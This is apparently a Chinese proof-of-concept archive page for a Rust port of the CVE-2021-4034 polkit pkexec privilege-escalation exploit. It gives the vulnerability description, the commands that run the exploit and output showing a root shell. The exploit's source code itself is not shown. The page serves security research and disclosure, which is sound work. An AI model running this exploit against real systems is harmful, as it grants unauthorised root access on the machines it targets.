POC详情: 7516ba798bfbe8d9ac988bd8f703b115980b55f5

来源
关联漏洞
标题: polkit 缓冲区错误漏洞 (CVE-2021-4034)
描述:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则,实现不同优先级进程间的通讯。 polkit 的 pkexec application存在缓冲区错误漏洞,攻击者可利用该漏洞通过精心设计环境变量诱导pkexec执行任意代码。成功执行攻击后,如果目标计算机上没有权限的用户拥有管理权限,攻击可能会导致本地权限升级。
描述
port of CVE-2021-4034 exploit to Rust/cargo for my own edification
介绍
### CVE-2021-4034 exploit but in rust, cause why not ?

Based on https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c

```
$ ./download-and-unpack-vulnerable-pkexec.sh
*optionally enable setuid/setgid for testing*
$ cargo run --bin prep && cd playground && cargo run --bin pwn
    Finished dev [unoptimized + debuginfo] target(s) in 0.00s
     Running `target/debug/prep`
    Finished dev [unoptimized + debuginfo] target(s) in 0.00s
     Running `/home/defhacks/hack/cve-2021-4034/target/debug/pwn`
gconv() called
sh-5.1# /bin/id
uid=0(root) gid=1000(defhacks) groups=1000(defhacks)
sh-5.1#
```
文件快照

[4.0K] /data/pocs/7516ba798bfbe8d9ac988bd8f703b115980b55f5 ├── [ 270] Cargo.toml ├── [ 854] download-and-unpack-vulnerable-pkexec.sh ├── [ 615] README.md └── [4.0K] src ├── [ 418] lib.rs ├── [ 754] main.rs └── [1.3K] prep.rs 1 directory, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。